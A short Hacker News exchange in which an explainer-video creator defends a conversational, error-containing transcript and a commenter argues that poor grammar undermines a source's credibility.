We talk about hashes and salt in another episode. You can't cover everything in 1 minute, especially when you want a 5 year old to be able to understand as well.

The text is the transcript, which is intentionally conversational not a formal essay. Maybe it is a good idea for us to change it though.

If your philosophy in life is to ignore learning ideas because you are offended by a grammar error, then you are probably right to skip out, the video isn't targeted at people like that.


Grammar is an honest signal. It's not surefire, but the scope of errors here portends quite poorly for the material.

Given issues of the modern Web, including the absolute deluge of information, finding credible and worthwhile sources is itself a challenge.

Communication -- writing or otherwise -- should be done for the benefit of the reader or audience. To borrow from another item on HN presently (concerning writing manuals).




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: